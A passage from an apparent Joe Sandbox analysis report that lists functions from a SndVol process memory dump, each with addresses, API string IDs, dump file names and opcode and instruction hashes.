                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: PreferredUILanguages
                                                                                                                                                  • API String ID: 0-1884656846
                                                                                                                                                  • Opcode ID: 2c3acf41ceb91eccf8ca9c9137485cc73723029ab3856cf356abcf460942a4be
                                                                                                                                                  • Instruction ID: ca819b980dc622005021f8b013435c38a77bafabea6c378d09d7d79bb73d040e
                                                                                                                                                  • Opcode Fuzzy Hash: 2c3acf41ceb91eccf8ca9c9137485cc73723029ab3856cf356abcf460942a4be
                                                                                                                                                  • Instruction Fuzzy Hash: 64419076D00219EBDB13EE96CC40BEEB7B9EF84794F51416AE901AB250DA34DE40C7A1
                                                                                                                                                  Function 366197A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: verifier.dll
                                                                                                                                                  • API String ID: 0-3265496382
                                                                                                                                                  • Opcode ID: fbcf8a49e4c118994e05eaccd1a3e4101f448062b31fa0cc15b61b6a325d5634
                                                                                                                                                  • Instruction ID: 297bdce390d525b3c9d0791a902e4abe1d1019de0ccf82db0ed3549f6b1cdf0b
                                                                                                                                                  • Opcode Fuzzy Hash: fbcf8a49e4c118994e05eaccd1a3e4101f448062b31fa0cc15b61b6a325d5634
                                                                                                                                                  • Instruction Fuzzy Hash: 7431A9B5A10301BFD7649F39D860B6677E6EB48790F90457AE645DF380EA318C81C791
                                                                                                                                                  Function 365874B0 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RtlValidateHeap
                                                                                                                                                  • API String ID: 0-1797218451
                                                                                                                                                  • Opcode ID: 852ae75f493b17a46bc826eac827efe6a6d73b3f22aebd8d0637800ab5ab05ad
                                                                                                                                                  • Instruction ID: 9eb8564fc9346bfd31cc6c3ccc32e28471a6d4b88c2d1c1a588d8946fe1d589b
                                                                                                                                                  • Opcode Fuzzy Hash: 852ae75f493b17a46bc826eac827efe6a6d73b3f22aebd8d0637800ab5ab05ad
                                                                                                                                                  • Instruction Fuzzy Hash: A4411176B007A69FEF02CF74C8947AEBBB2BF81254F548678D4516B680CB349901CF91
                                                                                                                                                  Function 3663705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: kLsE
                                                                                                                                                  • API String ID: 0-3058123920
                                                                                                                                                  • Opcode ID: f559a1d65f713fdf840b0a2754c4b5bf3d347f62ce55e83f40dd329d6e2aa9f9
                                                                                                                                                  • Instruction ID: 5336bc9ab5872ec4ae01f035c2d441cbb4cfeaa803e413312d4395a7c33deb63
                                                                                                                                                  • Opcode Fuzzy Hash: f559a1d65f713fdf840b0a2754c4b5bf3d347f62ce55e83f40dd329d6e2aa9f9
                                                                                                                                                  • Instruction Fuzzy Hash: 904124B290234D77E7119B71CC88BA53F97AB407E4F740128EE90EA0D1C7644482CBEB
                                                                                                                                                  Function 365C7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: #
                                                                                                                                                  • API String ID: 0-1885708031
                                                                                                                                                  • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                                                                  • Instruction ID: 4935f3f05009def1b78f8ca938bb1ac8c463802fbe8654c006ca064b02b89997
                                                                                                                                                  • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                                                                  • Instruction Fuzzy Hash: 2B41C0B9E00626EBEB25CF85C894BBEB3B5EF84345F50447AE84197640DB30D941CBE2
                                                                                                                                                  Function 365CD530 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: gh6
                                                                                                                                                  • API String ID: 0-72984805
                                                                                                                                                  • Opcode ID: ddc987cce3bc0a532e0ee0bf8651f4ef07b1a95dd6e10623fb9e698b9ff02894
                                                                                                                                                  • Instruction ID: ceefd5d28693d36d2c1e806246bae4263e388521a4192276dbc45edfadd61e8d
                                                                                                                                                  • Opcode Fuzzy Hash: ddc987cce3bc0a532e0ee0bf8651f4ef07b1a95dd6e10623fb9e698b9ff02894
                                                                                                                                                  • Instruction Fuzzy Hash: 3C21F671904754ABD711DFB5CD40B0B77EAAF94698F80093AEA44D7590EA20D850CBE7
                                                                                                                                                  Function 36595096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Actx
                                                                                                                                                  • API String ID: 0-89312691
                                                                                                                                                  • Opcode ID: 6b8ec48d613a65282490b905e81f1e338c29a678c0dab32f5373c9ceac277af2
                                                                                                                                                  • Instruction ID: c2c599e592151b6e2761e9fbdcda906f981b6f3aca7b9f6ece24b13d06fefd3f
                                                                                                                                                  • Opcode Fuzzy Hash: 6b8ec48d613a65282490b905e81f1e338c29a678c0dab32f5373c9ceac277af2
                                                                                                                                                  • Instruction Fuzzy Hash: 2211B279B497128BF7144D1A88506D6B3D5EB823ACF74893AE590CB390DA72DC61CBC0
                                                                                                                                                  Function 3661106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrCreateEnclave
                                                                                                                                                  • API String ID: 0-3262589265
                                                                                                                                                  • Opcode ID: 4c241e4dfacce7e777e39d11eb91c1e36227547d6d8e310ba8ddc91305db114f
                                                                                                                                                  • Instruction ID: aacb9ef76b34979ec9e85599d9ed3392aecc8fb325cdef32ffcacadf1e8a64d0
                                                                                                                                                  • Opcode Fuzzy Hash: 4c241e4dfacce7e777e39d11eb91c1e36227547d6d8e310ba8ddc91305db114f
                                                                                                                                                  • Instruction Fuzzy Hash: 2D2104B19183449FC310CF2AC845A5BFBE8ABD5B90F404A2EB99497250D7B0D805CB96
                                                                                                                                                  Function 365E739A Relevance: .7, Instructions: 705COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 66d521c475eba7af978e9dc81b58f7e44cd9d595af1cf0588e4ffc987c047135
                                                                                                                                                  • Instruction ID: 3d528b468609aa4a55971affeaa51261f5d0d28f77a4b3e6d45491459f453b0e
                                                                                                                                                  • Opcode Fuzzy Hash: 66d521c475eba7af978e9dc81b58f7e44cd9d595af1cf0588e4ffc987c047135
                                                                                                                                                  • Instruction Fuzzy Hash: AF42AE75E006169FEF08CF59C884AAEB7B2FF88354F64856AD551AB340DB30E842CF90
                                                                                                                                                  Function 366516CC Relevance: .6, Instructions: 571COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 14a68faba6bc537f82d83968bf7cfe93b173091f41b6bb79182a33e80278a636
                                                                                                                                                  • Instruction ID: 56a34805652fdc5aa54597686e688f5b540494b99eeb3f11bd0ae3f16c800a04
                                                                                                                                                  • Opcode Fuzzy Hash: 14a68faba6bc537f82d83968bf7cfe93b173091f41b6bb79182a33e80278a636
                                                                                                                                                  • Instruction Fuzzy Hash: 3D22C378E002168FDB09CF59C891A6EFBB2BF88384F65456DD655DB340DB30E942CB91
                                                                                                                                                  Function 3659D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 06a655953991ddd1b813a273bf96abfcf53ddc4170ef7552d0f5cbef9f959f12
                                                                                                                                                  • Instruction ID: 567af66d53aa35f71defa95c7f1cb3fcad87329ce87f4b25357e76ddf32cbe3e
                                                                                                                                                  • Opcode Fuzzy Hash: 06a655953991ddd1b813a273bf96abfcf53ddc4170ef7552d0f5cbef9f959f12
                                                                                                                                                  • Instruction Fuzzy Hash: 93C10074E14716DBEB18CF59C800BAEB7B6EF94354F508278D814AB281D771E952CFA0
                                                                                                                                                  Function 365AF460 Relevance: .3, Instructions: 321COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5fcd75a166ff92654b084b9d824bb4077d91a089dfa703bcce0ae8f5309e5b9d
                                                                                                                                                  • Instruction ID: e17d379b7d819b15ece32d661a17f1e2f18ed4fcef2cb8ec8ba6f8418c91b0d6
                                                                                                                                                  • Opcode Fuzzy Hash: 5fcd75a166ff92654b084b9d824bb4077d91a089dfa703bcce0ae8f5309e5b9d
                                                                                                                                                  • Instruction Fuzzy Hash: 1AC12275E003258BEB16CF19C590BAD77A2FF48758F55817AD981DB3A1EB308941CBA0
                                                                                                                                                  Function 365B90DB Relevance: .3, Instructions: 287COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 8a7977f711fb4378733c8939ebd13c8769b6d660c226f51d30d8708495ab6052
                                                                                                                                                  • Instruction ID: 2488925e1a1769be531d9ea2cbf3c932b61849e623ce96b9971a5caac8690a73
                                                                                                                                                  • Opcode Fuzzy Hash: 8a7977f711fb4378733c8939ebd13c8769b6d660c226f51d30d8708495ab6052
                                                                                                                                                  • Instruction Fuzzy Hash: 85A135B1910219AFEB12CFA4CC91FAE77B9EF85750F810164FA00AF2A0D7759C10CBA5
                                                                                                                                                  Function 3663B550 Relevance: .3, Instructions: 263COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                                                                                                                                  • Instruction ID: 45db7b945769ba621ba83331de83cb3ccb0c0234b27a983d07916ca4100f4a32
                                                                                                                                                  • Opcode Fuzzy Hash: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                                                                                                                                  • Instruction Fuzzy Hash: D3A17779A01605DFD724CF19C480A1AF7F6FFA8394F34856EE14A8B661E770E941CB81
                                                                                                                                                  Function 36599486 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 609aff9b45e98702657d291728eda91180400e2cd3e6d7166d7cd7d5a9d2156a
                                                                                                                                                  • Instruction ID: ccf1da93c9fb5752b13f99bb09bfd54a8b1c567e8646652577f7e77ab82699ea
                                                                                                                                                  • Opcode Fuzzy Hash: 609aff9b45e98702657d291728eda91180400e2cd3e6d7166d7cd7d5a9d2156a
                                                                                                                                                  • Instruction Fuzzy Hash: 62B15AB8900305DFEB14CF69C5806DA77F1BF98399F68456DD8259B291EB31D842CFA0
                                                                                                                                                  Function 36591131 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d2d481b64e82e2e39477399e6a68bebd3e85aaac5547520ac4e4e5c41851e001
                                                                                                                                                  • Instruction ID: f878ebcf77b4fddf36e9adfbd61cc60d5bbd8678a902e6bfaf63c5f99d6115fb
                                                                                                                                                  • Opcode Fuzzy Hash: d2d481b64e82e2e39477399e6a68bebd3e85aaac5547520ac4e4e5c41851e001
                                                                                                                                                  • Instruction Fuzzy Hash: 50B112B5A083809FD754CF29C980A5AFBF1BB89344F54496EF899C7351D730E845CB82
                                                                                                                                                  Function 3664B52F Relevance: .2, Instructions: 222COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                                                  • Instruction ID: c012718152eeaf6f1daab0b0fd494c215c643e45094c20949ebe0c867411a5cb
                                                                                                                                                  • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                                                  • Instruction Fuzzy Hash: B671D579E0421A9BDB06EF66C8C0AAEB7F5BF447D0F94451EDC00AB241E734E951CB91
                                                                                                                                                  Function 365BD090 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                                                  • Instruction ID: 6c4af3cff1ac767c3077506ac9b3e088b16fbc9790378a3c9a80563fcccf979f
                                                                                                                                                  • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                                                  • Instruction Fuzzy Hash: 1D81BE76E11216DBEF04CF59C880B9DB7B2EBC4344F58863AC815BB244DA329900CF91
                                                                                                                                                  Function 365C1FCD Relevance: .2, Instructions: 210COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                                                                                                                                  • Instruction ID: 33c76c410daee98c1d125cf894dda4b6866dbfb17f3b848a313d781489fff00b
                                                                                                                                                  • Opcode Fuzzy Hash: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                                                                                                                                  • Instruction Fuzzy Hash: 9981BD74A00706AFD715CFA9C880B9ABBF5FF48344F10856AE956D7391D730E940CBA5
                                                                                                                                                  Function 3663375F Relevance: .2, Instructions: 201COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2e9ebb6171f0de1bfad3b3ded9cde13dd3b55d79a1ec617b17e1794ef156fa6a
                                                                                                                                                  • Instruction ID: cf06f0c532b4339a1a190814ceeb03e12469e3d5c70ff5bb70ee4f3fa7dcd6b8
                                                                                                                                                  • Opcode Fuzzy Hash: 2e9ebb6171f0de1bfad3b3ded9cde13dd3b55d79a1ec617b17e1794ef156fa6a
                                                                                                                                                  • Instruction Fuzzy Hash: D2718175E01264EFDB11CF99D840AADB7B5FF89794F644025E840BB2A0DB30EC51CBA1
                                                                                                                                                  Function 3665903E Relevance: .2, Instructions: 186COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
